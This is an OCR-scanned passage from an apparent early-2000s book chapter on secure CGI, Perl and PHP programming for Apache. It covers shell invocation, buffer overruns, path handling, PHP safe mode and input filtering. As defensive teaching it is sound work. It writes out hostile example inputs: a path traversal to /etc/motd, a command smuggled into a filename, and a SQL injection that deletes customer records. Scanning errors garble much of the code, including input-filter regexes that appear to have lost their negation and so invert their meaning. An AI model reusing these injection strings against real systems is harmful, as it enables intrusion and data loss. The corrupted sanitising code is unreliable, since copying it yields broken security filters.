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print "Your PPP process [PID $my_ppp[®]] has been terminated! \n" 


} 
} 
close(PS) ; 
if ($count==0) { 
print "There is no PPP process running right now\n"; 


Here’s an example of opening a process with open() without invoking the shell: 


open(PS, "|-") 
while (<PS>) { 
if(/pppd/) { 
$count++; 
@my_ppp = split(' ', $_); 
kill 1 $my_ppp[Q]; 
print "Your PPP process [PID $my_ppp[®]] has been terminated! \n" 
} 


Il exec("ps", "ea")3 


} 
close(PS) ; 
if ($count==0) { 
print "There is no PPP process running right now\n"; 


A practical example that recently surfaced was Matrix’s CGI Vault Last Lines 2.0 on 
Apache 1.3.17, 1.3.18, 1.3.19, 1.3.20, and 1.3.22. Last Lines CGI is a free, Perl-based 
CGI tool from Matrix Vault. It prints x number of lines from a specified log file to a 
specified Web page. The script doesn’t filter metacharacters properly, and therefore 

enables remote users to examine any Web-readable directory. 


BrainRawt detailed the problem on December 30, 2001, and the offending code was 
here: 


# $unixdir="path/here'; 
# $error_log is input by the user of the script. 


open(FILE, "$unix_dir/$error_log") 


As BrainRawt wrote: 


This script improperly filters in the input, allowing the traditional ../../../../../ path 
traversal chars, in return allowing the user to leave the hard coded $unix_dir and view any 


file readable by the Web server. 
EX:../../../../../../etc/motd 
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This script is also missing a < in the open() function which will allow us to execute any 


command on that remote server that the Web server has permission to execute. 


EX: path/to/error_log;command arg1| 


But problems inherent in invoking the shell with open() aren’t limited to Perl. 
Exercise care when performing these tasks in any language. For example, even in 
Python, if you fail to apply adequate controls, you'll see equally negative results with 
os.system() and os.popen(). 


eval (Perl and shell) 


eval is a function available in shells and Perl, typically invoked as eval expression. 
As explained in the Perl documentation: 


EXPR [expression] is parsed and executed as if it were a little Perl program. It is executed in 
the context of the current Perl program, so that any variable settings, subroutines, or format 

definitions remain afterwards. The value returned is the value of the last expression evaluated, 
or a return statement might be used, just as with subroutines. 


eval will execute commands, all arguments passed to such commands, and even 
additional, sequential, or piped commands. Using eval is therefore quite risky, and 
offers attackers an opportunity to try a wide range of attacks. 


exec() in Perl 


The exec() function enables you to execute external commands. As explained in the 
perlfunc documentation: 


The exec() function executes a system command AND NEVER RETURNS. Use the system() 
function if you want it to return. If there is more than one argument in LIST, or if LIST is an 
array with more than one value, it calls execvp(3) with the arguments in LIST. If there is 
only one scalar argument, the argument is checked for shell metacharacters. If there are any, 
the entire argument is passed to /bin/sh -c for parsing. 


This is risky. exec will execute the command, all arguments passed to it, and even 
additional, sequential, or piped commands. For this reason, if you use exec (not 
recommended), enclose each individual argument in quotes, like this: 


exec ‘external_program', ‘arg1', ‘arg2' 


This will prevent attackers from passing arguments or commands onto the list. 
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Buffer Overruns 


Buffer overruns are still another example of how user input can materially alter your 
program’s execution and performance. When you write C programs, be sure to use 
routines that provide buffer boundary checking. If you don’t, attackers might be able 
to overrun the buffer, causing your program to fault. This can offer attackers an 
opportunity to execute malicious code. 


For example, consider gets(). gets() is available via the standard I/O library 
(stdio.h), and provides a mechanism to read a line of user input. As explained in 
the fgetc man page: 


gets() reads a line from stdin into the buffer pointed to by s until either a terminating 


newline or EOF, which it replaces with '\@'. No check for buffer overrun is performed. 


Here’s an example of gets() in use where the character buffer is set to 20: 


/* gets_exa,ple.c - Why not to use gets() */ 
#include <stdio.h> 


void main() { 


char username[20]; 

printf("Please enter your username: ya 
gets (username) ; 

printf ("%ss\n", username); 


When run, gets_example reads in username and spits it back out: 


linux6$ gets_example 

Please enter your username: anonymous 
anonymous 

linux6$ 


But what if the user doesn’t enter 20 characters or fewer? What if the user floods 
gets_example with garbage like this: 


linux6$ gets_example 

Please enter your username: anonymousaaaaaaaaaaaaaaaaso555555555555555555555 
=» 55555555555555555 
anonymousaaaaaaaaaaaaaaaaso55555555555555555555555555555555555555 

Bus error (core dumped) 

linux6$ 
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Or even this: 


linux6$ gets_example 

Please enter your username: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
Segmentation fault (core dumped) 

linux6$ 


In both cases, gets_example core dumps, because, as explained in the gets() man 
page: 
...it is impossible to tell without knowing the data in advance how many characters gets () 


will read and ...gets() will continue to store characters past the end of the buffer. 


Attackers search high and low for such holes because they can exploit them to run 
malicious code in unintended memory space. 


In addition to gets(), avoid using all the following routines: 


e fscanf()—fscanf() reads input from the stream pointer stream. In many 
instances, you can use fgets() instead. 


e realpath()—realpath() expands all symbolic links and resolves references to 
/./,/../, and extra / characters in the null terminated string named by path. 


e scanf()—scanf() reads input from the standard input stream stdin. Try using 
fgets() first to get the string, and then use sscanf() on it. 


e sprintf ()—sprintf() writes to the character string str, but does not check 
the string’s length. Try snprintf() instead. 


e strcat()—strcat() concatenates two strings (and appends the src string to 
the dest string), but does not check string length. Use strncat() instead. 


e strcpy()—strcpy() copies a string pointed to be src to the array pointed to 
by dest, but does not check string length. Use strncpy() instead. 


A sobering example of how buffer overruns can jeopardize your system is the 
sper15.003 bug. suidperl is a tool for securely running setuid Perl scripts. CERT 
reported that 


Due to insufficient bounds checking on arguments which are supplied by users, it is possible 
to overwrite the internal stack space of suidper1 while it is executing. By supplying a carefully 
designed argument to suidperl, intruders might be able to force suidperl to execute arbi- 
trary commands. As suidperl is setuid root, this might enable intruders to run arbitrary 


commands with root privileges. 
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The problem arose in a function using sprintf (). To see a detailed analysis of that 
hole (and test attack code that demonstrates how attackers exploit buffer overruns), 
go to http: //www.ryanspc.com/exploits/perl.txt. 


Other interesting recent examples include the following: 


e Microsoft Telnet Server, February 2002—A buffer overflow here (Windows 2000 
and Interix) will not only kill the Telnet server, but also enable remote attack- 
ers to execute system-level commands, such as delete, erase, rmdir, and 
so on. 


e Common Unix Printing System, February 15, 2002—CUPS has a scheduler, and 
within the scheduler is a source file named jobs.c. This file uses strcat() 
(mentioned previously as a function not to use) to copy a name attribute. It has 
no limit on the name, and thus offers an overflow to remote attackers. By 
exploiting this, attackers can execute code on the target. 


e Apple QuickTime, February 8, 2002—Remote attackers can overflow the 
Content-Type header buffer, thus leading to elevated privileges and perhaps 
other nasty things. 


e Oracle 9iAS Apache PL/SQL Module—Oracle 9iAS ships with a PL/SQL Apache 
module that provides Database Access Descriptor (DAD) management facilities. 
On or about December 20, 2001, David Litchfield of NGSSoftware identified a 
buffer overflow. This could lead to remote attackers executing code on the 
target. 


Even Apache suffered an overflow of this type. In September 2001, an individual 
who gave only an e-mail address identified the problem in Windows 98 Apache 1.3 
(only on Win32). When attackers sent a URL consisting of 200 forward slashes (/), 
Apache Win32 would expose directory contents. Apache’s team fixed it in version 
1.3.21. 


Check the following links to learn more about buffer overflows: 


e Libsafe—Tim Tsai and Navjot Singh wrote the HTML and source code for this 
loadable library: http://www. avayalabs.com/project/libsafe/index.html. 


e ITS4—Crispin Cowan and the folks at Software Security Group Cigital Designs 
designed this bounds-checking tool to scan C source code for vulnerabilities: 
http://www.cigital.com/its4/. 


e StackGuard—Automatic Adaptive Detection and Prevention of Buffer-Overflow 
Attacks; Crispin Cowan, Calton Pu, Dave Maier, Heather Hinton, Jonathan 
Walpole, Peat Bakke, Steve Beattie, Aaron Grier, Perry Wagle and Qian Zhang; 
Department of Computer Science and Engineering, Oregon Graduate Institute 
of Science & Technology. http: //www.cse.ogi.edu/DISC/projects/ 
immunix/StackGuard/usenixsc98_html1/. 
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e Bounds Checking Projects, Greg McGary. 
http://gcc.gnu.org/projects/bp/main.html. 


e “Attack Class: Buffer Overflows,” Evan Thomas. University of British Columbia. 
http: //www.cosc.brocku.ca/~cspress/HelloWorld/ 1999/04 - 
apr/attack_class.html. 


e “Smashing the Stack for Fun and Profit,” Aleph One, (excerpted from Phrack 49). 
http: //www.cse.ogi.edu/DISC/projects/immunix/StackGuard/profit.html. 


e “How to Write Buffer Overflows,” by Mudge of LOpht Heavy Industries. 
http: //www.insecure.org/stf/mudge buffer_overflow_tutorial.html 


e “Buffer Overruns, What’s the Real Story?,” by Lefty, Lefty 
lefty@sliderule.geek.org.uk. http://crack.sh/hack/buffer%20over - 
runs , *20whats%s20thes20real%20story.htm. 


e “Stack Smashing Vulnerabilities in the Unix Operating System,” Nathan P. 
Smith, Computer Science Department, Southern Connecticut State University. 
http: //destroy.net/machines/security/. 


e “Finding and Exploiting Programs with Buffer Overflows,” by prym 
(prym@sunflower.org). http://destroy.net/machines/security/buffer.txt. 


e “Compromised—Buffer—Overflows, from Intel to SPARC Version 8.” Mudge. 
http: //www.atstake.com/research/advisories/1996/bufitos.pdf. 


e “An Empirical Study in the Reliability of UNIX Utilities.” Baron P. Miller, David 
Koski, Ravi Murthy, Cjin Pheow Lee, Vivekananda, Ajitkumar Natarajan, Jeff 
Steidl, Computer Science Department, University of Wisconsin. 
ftp://grilled.cs.wisc.edu/technical_papers/fuzz-revisited.ps.Z. 


Handling User Input 


You can never anticipate every possible combination of characters in a user’s input. 
Most users will input appropriate strings (or those they think are appropriate). But 
crackers will try exotic combinations, looking for weaknesses in your program. To 
guard against such attacks, take the following steps: 


e Ensure that your code uses only those routines that check for buffer length. Or, 
if it contains routines that don’t, insert additional code that does. 


e Ensure that you explicitly specify environment variables, initial directories, and 
paths. 


e Subject your code to rigorous testing. Try overflowing the stack, pushing addi- 
tional commands onto the argument list, and so on. Essentially, try cracking 
your own program. 
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e In Perl scripts, screen out metacharacters by enforcing rules that allow only 
words, asin ~ tr/*[\w ]//g. Note: many tutorials suggest that you explicitly 
define forbidden characters (that which is not expressly denied is permitted). 
Try to avoid doing this. The favored approach is to explicitly define approved 
characters instead (that which is not expressly permitted is denied). This 
method is more reliable. 


e Also, use taintperl, which forbids the passing of variables to system functions. 
taintperl can be invoked in Perl 4 by calling /usr/bin/taintper1l, and in Perl 
5 by using the -T option when invoking Perl, as in #!/usr/bin/perl -T. 


NOTE 


Note that merely checking buffer length is a dicey practice. Ensure that you also limit buffer 
length in your code. 


Paths, Directories, and Files 


When writing CGI programs, always specify absolute paths. This will prevent attack- 
ers from tricking your script into executing an alternate program with the same 
name. 


For example, never do anything like this: 


# set up a directory variable 
$DIR=" pwd" ; 
chop($DIR) ; 
# and then later on... 
sub some_function { 
open(EXTERNAL_SCRIPT, "$DIR/myprogram.p1|) ; 


Never use relative paths, either. Relative paths point to locations relative to the 
current directory. Consider this script: 


open (DATABASE, "search/data/clients.dat|"); 
while(<DATABASE>) { 
if(/$contents{'search_term'}/gi) { 
$count++; 
print "$fields[5] $fields[6] $fields[7]<br>\n"; 
} 


} 
close (DATABASE) ; 
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if($count < 1) { 
print "No matches!\n"; 


This doesn’t identify a hard path. If you moved this script, the path leading to 
clients.dat would change: 


e In /var/http, the script points to /var/http/search/data/clients.dat. 


e In /etc/http, the script points to /etc/http/search/data/clients.dat. 


Instead, point to the absolute path, like this: 


open (DATABASE, "/var/http/ourcompany.net/search/data/clients.dat") ; 
while(<DATABASE>) { 
if (/$contents{'search_term'}/gi) { 
$count++; 
print "$fields[5] $fields[6] $fields[7]<br>\n'"; 
} 
} 
close (DATABASE) ; 
if($count < 1) { 
print "No matches!\n"; 


This way, there’s no ambiguity. The script points to one file only: /var/http/ourcom- 
pany.net/search/data/clients.dat. 


Never deviate from this rule, even when launching simple programs. For example, 
suppose you did this: 


system("date"); 


or even this: 

$mydate=‘date’; 

If an attacker can alter $PATH and point to an alternate date, your script will execute 
it. If you're dead set on executing programs in this manner, try this instead: 


system("/bin/date"); 


Or this: 


$mydate="/bin/date  ; 


Also, consider hardcoding your initial working directory at startup. For this, use 
chdir. 
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chdir() 


chdir(), available in C from unistd.h and also a native Perl function, changes the 
current directory. chdir() can return many errors that might alert you to problems, 
such as whether the target actually exists. Also, as an additional measure, consider 
following your chdir() with an lstat(). This will verify that the target is actually a 
directory, as opposed to a symbolic link. 


Files 


If your CGI programs create or open files, observe these rules: 


e Always include error-handling code to warn you if the file isn’t actually a file, 
cannot be created or opened, already exists, doesn’t exist, requires different 
permissions, and so on. 


e Watch what directories you use to create or open files. Never write a file to a 
world-writable or world-readable directory. 


e Always explicitly set the file’s UMASK. 


e Set file permissions as restrictively as possible. If the file is a dump of user 
input, such as a visitor list, the file should be readable only by the processes 
that will engage that file. 


e Ensure that the file’s name does not have metacharacters in it, and if the file is 
generated on-the-fly, include a screening process to weed out such characters. 


PHP 


PHP is a general-purpose scripting language especially suited for Web development. 
Unlike many other languages prevalent in CGI, PHP resides within HTML code. 
When the client submits this code to the server (Apache, in this case), the server 
(typically through a PHP module or interpreter) executes PHP-nested commands. 


Some typical configurations: 
e PHP to Apache to MySQL 
e PHP to Oracle AppServer to Oracle via Oracle Call Interface 
e PHP to IIS to SQLServer 


PHP holds several advantages over other similar technologies. One is its speed 
(coupled with MySQL on record sets with less than five million entries, PHP + 
Apache + MySQL outpaces even JSP + Oracle and most ODBC-reliant client-to-server 
Web configurations). 
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Another advantage (and disadvantage) is PHP’s ability to nest in HTML. This 
provides rapid application development for the Web. Developers can quickly use this 
combination to construct complex Web applications, wrapping HTML around func- 
tional PHP code. 


However, such configurations invite developers to fuse interface code (HTML, 
JavaScript, VBScript) with logic code (PHP code that performs database lookups or 
other useful functions). This fosters problems that—while not traditionally security 
issues—create hospitable environments for security holes, even if merely through the 
banal condition of disorganization. 


Conventional wisdom warns against fusing interface and operational code, although 
some languages force this on you (Microsoft Visual Basic, Envelop, Tcl/TK, and so 
on). However, in such languages, you typically create functions to perform often- 
called procedures, so you write them only once. You should do this with PHP too, 
but many inexperienced developers don’t. 


NOTE 

Instead of spreading out your PHP functions in many different files (whether they're .php or 
.phtml files), centralize and deposit these into include files. You can call these using 
include(). You can then use data derived from and returned by these functions in layout 
directives nested in HTML. This way, your logic code remains isolated from your interface 
code, and remains centralized, as C or C++ libraries are. 


PHP has had a significant security history relevant to programming. Let’s briefly 
cover that history now. 


Issues Central to PHP Programming Security 


PHP is an excellent language choice. However, like Perl and other similar tools, PHP 
is powerful and can reach into any system area. For this reason, approach PHP devel- 
opment with appropriate caution. To compare the difference, consider a C-based CGI 
application. It can rarely execute system calls or retrieve environment variables 
unless you first expressly include this functionality. 


Because PHP also functions as a general-purpose scripting language suitable for 
system administration (similar to Perl or the shells), it inherits certain issues you 
cannot ignore. One relates to environment. 


NOTE 


You can use PHP either through module access to Apache (preferred), or in a standard CGI 
scripting language context, where script files call the PHP interpreter, similarly to how people 
historically used (and sometimes still use) Perl. If possible, go with module support rather than 
using the interpreter. Not only does this offer more speed, but it also invites fewer security 
hazards. 
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PHP and Environment 

Unlike many other languages, PHP interfaces with your underlying operating system 
in a way similar to shells. It therefore assumes values for certain variables. For 
example, consider this code: 


<? 
$p = $PATH; 
$v = split(":", $p); 
for($i=0; $i<=count($v); $i++) { 
print "$v[$i]<br>"; 
} 


?> 


Here, like a thousand shell scripts or batch files you’ve seen, PHP pulls the path 
available to the Web server, flows it into an array, and prints out each value. When 
aimed at Apache, output will vary depending on your configuration, but PHP will 
print out the path 


/sbin 
/usr/sbin 

/bin 

/usr/bin 
/usr/X11R6/bin 


It does the same when you use it as a garden-variety scripting tool, although these 
values will differ again, depending on the user PHP executes as. Here’s the code: 


#!/bin/php 
<? 
$p = $PATH; 
$v = split(":", $p); 
for($i=0; $i<=count($v); $i++) { 
print "$v[$i]\n"; 
} 


?> 


Here’s the result, executed by root: 


/adabas/bin 
/adabas/pgm 
/usr/bin 

/bin 

/usr/local/bin 
/usr/X11R6/bin 
/home/anonymous/bin 
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Or, at the extreme, consider this code: 


#!/bin/php 
<? 
$p = ‘set’; 
$v = split(":", $p); 


for($i=0; $i<=count($v); $i++) { 
print "$v[$i]\n"; 
} 


?> 


Here’s the result: 


X-Powered-By: PHP/4.0.0 
Content-type: text/html 


BASH=/bin/sh 
BASH_ENV=/home /anonymous/ .bashrc 
BASH_VERSION=1.14.7(1) 
DBCONFIG=/adabas/sql 
DBROOT=/adabas 
DBWORK=/adabas/sql 
EUID=0 

HISTSIZE=1000 

HOME=/ root 
HOSTTYPE=i386 

IFS= 


INPUTRC=/etc/inputrc 
KDEDIR=/usr 

LANG=en_US 
LD_LIBRARY_PATH=/adabas/1lib 


LESSOPEN=|/usr/bin/lesspipe.sh %s 
LOGNAME=anonymous 

LS _COLORS=no=00 

Fi=00 

di=01;34 

1n=01 ; 36 

pi=40;33 

$0=01 535 

bd=40;33;01 

cd=40;33;01 
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or=01 505537541 
mi=01 305337341 
ex=01 532 

* cmd=01 532 
* exe=01 532 
* com=01;32 
* btm=01;32 
* bat=01;32 
* sh=01 532 
* csh=01;32 
* tar=01;531 
*.tgz=01;31 
* arj=01;31 
*,taz=01;31 
* 1lzh=01;31 
* zip=01;31 
* .z=01;31 

* Z=01;31 

* .gz=01;31 
* bz2=01;31 
* ,bz=01;31 
* tz=01;31 
* .rpm=01;31 
* cpi0=01;31 
* jpg=01;35 
* gif=01 535 
*  bmp=01 ; 35 
*. xbm=01 535 
*. xpm=01 535 
*  png=01 535 
* tif=01;35 


MAIL=/var/spool/mail/anonymous 
OPTERR=1 

OPTIND=1 

OSTYPE=Linux 

PATH=/adabas/bin 

/adabas/pgm 

/usr/bin 

/bin 

/usr/local/bin 

/usr/X11R6/bin 
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/home/anonymous/bin 
PPID=4134 

PS4=+ 

PWD=/root 
QTDIR=/usr/lib/qt-2.1.0 
SHELL=/bin/bash 

SHLVL=3 
SSH2_CLIENT=63.69.110.194 1558 63.69.110.193 22 
TERM=vt100 

UID=0 

USER=anonymous 
USERNAME= 
_=/usr/local/bin/php 


Note that here, PHP calls not a utility located in a directory (a binary executable like 
/bin/date), but instead a built-in shell command. Hence, PHP is shell-aware, and 
provides shell-based and other such variables globally. Therefore, hardcode variables 
in PHP or make them inaccessible. If you don’t, outsiders might find a way to pass 
arbitrary values back. 


NOTE 


I’ve seen varied approaches to this—and not every approach was well considered. For 
example, one development team (at a bank, no less) made tests of origin (that is, if the 
request didn’t initiate on localhost, PHP rejected it). For reasons you can well imagine, that 
didn’t work out (spoofing is relatively simple). 





Finally, note that in some cases, remote attackers can set certain variables in GET or 
other HTTP methods. It’s therefore worth your time to create a function that you 
include in every script that checks for this, and combine it with mod_usertrack (such 
as where you have concerns about variables like HTTP_REMOTE_USER). 


PHP Safe Mode 

You should also consider running PHP in safe mode. Safe mode (a state that you 
achieve via php.ini settings, as described later) prevents PHP scripts from launching 
from anywhere but the location you specify. 


Think of safe mode as similar to (but more powerful than) Apache’s suexec feature. It 
enables you to specify where PHP scripts launch from and denies those PHP scripts 
the right to execute external programs. That is, safe mode prohibits PHP scripts from 
running any program that does not reside within the restricted environment you 


specify. 


PHP 279 


To establish and manipulate PHP’s safe mode, you use one, more, or all of the 
following six directives: 


e safe_mode—Takes one argument (on or off). If off, safe_mode remains 
disabled. If on, safe_mode enables you to use the other directives associated 
with it. 


e open_basedir—Limits the files that PHP can open to only those files located in 
the directory tree you specify. 


e safe_mode_exec_dir—Specifies the directory from which PHP can launch 
programs. 


e safe_mode_allowed_env_vars—Use this to specify what environment variables 
you'd like to allow PHP to access. 





e safe_mode _protected_env_vars—Use this to specify what environment vari- 
ables scripts cannot access. 


e disable_functions—Use this to prohibit PHP from running certain functions. 
Table 12.3 lists functions that disable_functions disables. 
NOTE 


Note that disable_functions doesn’t completely disable the following functions. Rather, it 
restricts them to certain rules inherent in safe_mode. 


TABLE 12.3 Functions You can Disable with disable_functions 


Function Description 





chdir() If the target directory has the same UID as your PHP script, PHP will 
allow the function. If not, it won’t. 

chgrp() If the target file or directory has the same UID as your PHP script, PHP 
will allow the function. If not, it won’t. 

chmod () If the target file or directory has the same UID as your PHP script, PHP 
will allow the function. If not, it won’t. 

chown() If the target file or directory has the same UID as your PHP script, PHP 
will allow the function. If not, it won’t. 

copy() If the target file or directory has the same UID as your PHP script, PHP 
will allow the function. If not, it won’t. 

dbase_open() If the target file or directories have the same UID as your PHP script, 
PHP will allow the function. If not, it won't. 

dbmopen() If the target file or directories have the same UID as your PHP script, 
PHP will allow the function. If not, it won't. 
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TABLE 12.3 Continued 








Function Description 

d1() safe_mode disables this function altogether. 

exec() This limits execution to those executable files specified in 
safe_mode_exec_dir. 

filepro() If the target file or directories have the same UID as your PHP script, 


filepro_retrieve() 


filepro_rowcount() 


getallheaders() 
link() 


mkdir () 


move_uploaded_file() 


passthru() 


pg_loimport() 


popen() 


posix_mkfifo() 


putenv() 


rename () 


rmdir () 


shell_exec() 
symlink () 


system() 


touch() 


unlink() 


PHP will allow the function. If not, it won't. 

If the target file or directories have the same UID as your PHP script, 
PHP will allow the function. If not, it won't. 

If the target file or directories have the same UID as your PHP script, 
PHP will allow the function. If not, it won't. 

This instructs PHP not to return Authorization headers. 

If the target file or directory has the same UID as your PHP script, PHP 
will allow the function. If not, it won’t. 

If the target directory has the same UID as your PHP script, PHP will 
allow the function. If not, it won’t. 

If the target file or directories have the same UID as your PHP script, 
PHP will allow the function. If not, it won't. 

This limits execution to those executable files specified in 
safe_mode_exec_dir. 

If the target file or directories have the same UID as your PHP script, 
PHP will allow the function. If not, it won't. 

This limits execution to those executable files specified in 
safe_mode_exec_dir. 

If the target directory has the same UID as your PHP script, it will 
execute the specified function. If not, it won't. 

Allows manipulation of only those variables that meet the criteria in 
your previously-specified safe_mode_protected_env_vars and 
safe_mode_allowed_env_vars ini-directives. 





If the target file or directory has the same UID as your PHP script, PHP 
will allow the function. If not, it won’t. 

If the target file or directory has the same UID as your PHP script, PHP 
will allow the function. If not, it won’t. 

safe_mode disables this function altogether. 

If the target file or directory has the same UID as your PHP script, PHP 
will allow the function. If not, it won’t. 

This limits execution to those executable files specified in 
safe_mode_exec_dir. 

If the target file or directory has the same UID as your PHP script, PHP 
will allow the function. If not, it won’t. 

If the target file or directory has the same UID as your PHP script, PHP 
will allow the function. If not, it won't. 
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However, the serious problems with PHP—like any language—lay in developers’ 
failure to adequately screen user input. 


User Input Validation and Screening 

The problem with PHP (and Perl, to perhaps a lesser extent) is that it operates on 
multiple underlying systems on your server. Not only is it shell-aware and shell- 
enabled, it will also likely be database-aware. A poorly considered table-naming strat- 
egy and insufficient efforts to screen user input together make disasters. 


For example, a typical SQL statement called from within PHP and destined for 
MySQL might look like this: 


mysql_db_query($DB, "SELECT * FROM table WHERE value=X") ; 


Suppose, for sake of argument, that you're a lazy developer who names tables in 
unimaginative ways. For example, you might name the table customers and value 
index (to indicate an auto-incremented index number and primary key for each 
registered customer). This would make a cracker’s job of guessing your table and field 
names easy. From there—if you also failed to institute stringent input validation—an 
attacker might append something like this: 


;DELETE * FROM customers WHERE index>® 


If you also granted the PHP/MySQL user DELETE privileges, you’d be in a heap of 
trouble. PHP would dutifully delete all your customer records. 


NOTE — — oo 
The preceding example really makes two points. One is overt: Bad naming and poor or no 
input validation is dangerous. However, another somewhat less overt issue is this: When you 
expand Apache's capabilities with modules, databases, and other tools, each introduces new 
security issues. For instance, the preceding example shows how bad naming conventions, no 
input validation, and lax database permissions can work in concert. If, for example, you did 
not grant DELETE privileges in MySQL to the PHP/MySQL user, the above attack wouldn’t 
work out. Hence, to secure your system, you must learn all security procedures for all tech- 
nologies you graft to Apache. Miss one, and you're asking for trouble. 





Input filtering works in PHP much like Perl. The quick down-and-dirty method is to 
merely replace unwanted characters with another value via a regular expression func- 
tion. Many folks convert them to white space: 


$args = preg _replace("/[*A-Za-z0-9]/","",$args) ; 
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This is good, providing that white space doesn’t break the function that receives 
$args. Hence, you might consider handling multiple white space characters prior to 
passing $args to a function or command. 


NOTE 


Metacharacters aren't the only things to filter, either. Certain words have significance in a 
database context, such as LIKE, WHERE, and SELECT. 





PHP enables you to perform data validation in innumerable ways, but it also ships 
with two built-in functions for this purpose: 


e escapeshellarg() 


e escapeshellcmd() 


escapeshellarg() escapeshellarg(), as per PHP documentation: 


...adds single quotes around a string and quotes/escapes any existing single quotes allowing 
you to pass a string directly to a shell function and having it be treated as a single safe argu- 
ment. This function should be used to escape individual arguments to shell functions coming 


from user input. The shell functions include exec(), system(), and the backtick operator. 


This prevents remote attackers from chaining arguments. Thus, if you do build 
commands from user input—a dangerous practice in any situation—consider using 
escapeshellarg(). Use it when you flow user input into a variable and execute some 
external process on that data. PHP will deliver the data as a single argument. 


$ip=escapeshellcarg($cgivar) ; 
exec("/usr/bin/nslookup $ip",$ret_strs) ; 


One thing to watch is that escapeshellarg() returns arguments as “argument” and 
not ‘argument’. Moreover, carefully consider what mischief unexpected user input 
can bring (in light of what arguments the target command takes). In almost any 
case, you should scrub the user input prior to sending it through escapeshellarg(). 


escapeshellcmd() escapeshellcmd(), as per PHP documentation: 


...escapes any characters in a string that might be used to trick a shell command into execut- 
ing arbitrary commands. This function should be used to make sure that any data coming 
from user input is escaped before this data is passed to the exec() or system() functions, or 
to the backtick operator. 
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Note the difference between escapeshellarg() and escapeshellcmd(). escapeshell- 
cmd() lets you first clear shell metacharacters from user input and then add them (if 
needed) within your system call. escapeshellarg() instead ensures that arguments 
are passed on an individual basis. 


escapeshellcmd() comes in handy for this: 


$fn = escapeshellcmd ($file) ; 
system("path/command \"/path/$fn\"; command \"/path/$fn\""); 


Here, you scrub the user input clean (a filename) to prevent any unwanted 
metacharacters from passing through. Then, you call the desired command and add 
metacharacters or escape sequences where you need them. 


Include Procedures in PHP 

As I earlier related, you shouldn’t fuse interface and logic code. To get around this, 
you could create C-style library files that PHP can call, typically at the top of a script, 
like this: 


include "url|filename'; 


Such URLs or files include functions that you'll repeatedly use in many PHP scripts 
across your enterprise. 


Here’s an example: 


function GetPayType ($method) { 
switch($method) { 
case 1: // Credit card 
$pt = 1; 
break; 
case 2: // Check 
$pt = 2; 
break; 
case 3: // Wire 
$pt = 3; 
break; 


if ($pt == "") return "ERROR: no method specified"; 
else return $pt; 
} 
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The preceding fragment is a simple function that registers one of three payment 
methods, or a failure (when PHP can’t determine what happened, or perhaps the 
user failed to specify). The first issue here centers on the type of includes you call. 
Never call your includes from a URL. For example, no matter who instructs you differ- 
ently, never do this: 


include "cgiserver.yourdomain.net/cgi/globals.inc"; 


Don’t do it even if the URL is on localhost, attached to the same or a virtual host. 
Here’s why: a) Spoofing by hostname is easy; and b) You cannot guarantee that the 
URL is safe or trusted. Attackers may have altered it. Moreover, just from a reliability 
viewpoint, calls to URLs are chancy. Using them, you rely on the assumption that 
Apache will function correctly on the target machine, that the file is unchanged, 
that the file still exists, that it’s still where it’s supposed to be, and that there’s an 
open communication channel between your localhost and the target domain 
storing the include file. 


The second issue concerns naming. Many developers name such include files with 
extensions of .inc, .h, .c, .cc, .func, .lib, or .include. These extensions are 
expressive and easy to guess, and crackers will try to isolate files named this way 
first. 


The third issue is where you place these files. Never place them beneath 
DocumentRoot. Here’s why: Suppose you named your files with an .inc extension 
anyway. Attackers trying widely varied filenames (globals.inc, functions. inc, and 
so on) might land on a file that actually exists. Suppose they do. What will Apache 
do when it processes the attacker’s request? Naturally, it will send the file to the 
attacker’s Web client. And because clients don’t generally have a provision for 
handling files with an .inc extension, the attackers will receive your include file’s 
source code (something that should never happen). 


NOTE 


One approach is to name these files with a PHP extension, place a filter at initialization to 
block arguments, and below this, insert a routine that a) pulls exhaustive information from 
any client that sends such strings for enhanced logging; and b) returns an error, or simply 
jettisons the requesting client back to home. 





Conditional Processing: Surveying the Possibilities 

Before committing a function to source, ask yourself this: Did you anticipate every 
conceivable result of a function call? Did you anticipate every conceivable value that 
could pass to your function? 
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Take another look at the sample code that ascertains a client’s payment method: 


function GetPayType ( $method ) { 
switch($method) { 
case 1: // Credit card 
$pt = 1; 
break; 
case 2: // Check 
$pt = 2; 
break; 
case 3: // Wire 
$pt = 3; 
break; 


if ($pt == "") return "ERROR: no method specified"; 
else return $pt; 
} 


Something is wrong, and if you look for just a moment, you'll see it. The function 
GetPayType() doesn’t adequately handle every contingency. It returns either an error 
or $pt’s value, but only providing that 


e $pl=1 
e $pl=2 
e $pl1=3 
e $pl=” “ 


What if $pt’s value is instead a 5000-character string? True, the script might not 
assign $pt anything, but equally, it wouldn’t return the error. So what would happen? 
Answer: That would depend on other factors. Perhaps nothing, or if functions that 
need $pt receive it as NULL, or worse, receive nothing, they might do something 
unintended (unless they contain code that expects and deals with such happenings). 
Such black holes, or unknowns, are things you never want to leave open. Thus, care- 
fully consider every possible contingency. 


PHP-Specific Security Issues 


PHP also had two serious security issues arise in February and March 2002. These 
include 


e File upload boundary checks 


e Heap overflows 
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Buffer overflows in php_mime_split in PHP 4.1.0, 4.1.1, and 4.0.6 and earlier, and 
php3_mime_split in PHP 3.0.x allowed remote attackers to execute arbitrary code via 
a multipart/form-data HTTP POST request when file_uploads were enabled in 
php.ini. Initially, this was billed as a bug whereby attackers could only crash 
Apache. Exploit code from Gabriel A. Maggiotti demonstrating that approach is 
available at http: //qb®x.net/. However, PHP developers later released an advisory 
indicating otherwise. 


PHP 3.0.10-3.0.18, 4.0.1-4.0.3pl1, 4.0.2-4.0.5, 4.0.6-4.0.7RC2, and 4.0.7RC3-4.1 
were all affected. However, crackers enjoyed different results on different platforms 
(Linux, Solaris, and SolarisX86 were reportedly most affected). The heap overflows, 
on contrast, affected only PHP 4.0.1-4.0.3pl1. In both cases, the solution is to 
upgrade. 


Interesting Security Programming and Testing Tools 


Finally, Table 12.4 lists some interesting tools that can help you test your work. 


TABLE 12.4 Interesting Programming and Testing Tools 


Variable Purpose 





lclint This is a lint-like checker for ANSI C that checks risky data sharing, ignored 
return values, null values, memory management errors and much, much 
more. For a description of 1clint, go to 
http://www.doc.ic.ac.uk/lab/cplus/lclint/guide.htm1l. To get 1clint, 
go to ftp://ftp.sds.lcs.mit.edu/pub/lclint/guide.tar.gz. 

C Within A source code viewer that lets you selectively examine the results of prepro- 
cessing to determine what macros really expand to. Get it at 
http://www. thinkage.ca/english/index.shtml 

GNU Nana A free library providing improved support for assertion checking and logging 
